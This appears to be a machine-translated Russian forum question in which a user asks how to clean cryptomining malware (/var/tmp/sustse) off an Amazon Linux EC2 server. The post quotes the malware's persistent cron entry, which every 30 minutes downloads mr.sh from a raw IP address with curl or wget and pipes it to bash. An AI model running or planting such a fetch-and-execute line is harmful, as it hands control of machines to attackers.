Как очистить вредоносное вредоносное ПО, заражающее мой сервер Amazon Linux EC2?

За последние несколько дней я заметил, что приложения, работающие на моем экземпляре EC2 Linux, работают очень медленно. Бег top Команда показала мне, что есть процесс /var/tmp/sustse используя большую часть процессора.

Я убил этот процесс. Однако после перезагрузки экземпляр снова начал работать и использовать большую часть процессора. Он также делает записи cron для следующего скрипта:

*/30 * * * *    (curl -s http://107.174.47.156/mr.sh||wget -q -O - http://107.174.47.156/mr.sh)|bash -sh

Я гуглил и обнаружил, что это криптографическая вредоносная программа. Я удалил его следы из /var/ tmp / и удалил записи в Crontab. однако, кажется, что эти записи в Crontab откуда-то возвращаются, и я не смог отследить точное местоположение скрипта, который делает эти записи.

Я также очистил записи /var/ spool / cron *.

Я не нашел много информации в Интернете, чтобы решить эту проблему. Любая помощь здесь будет высоко ценится.

Заранее спасибо!!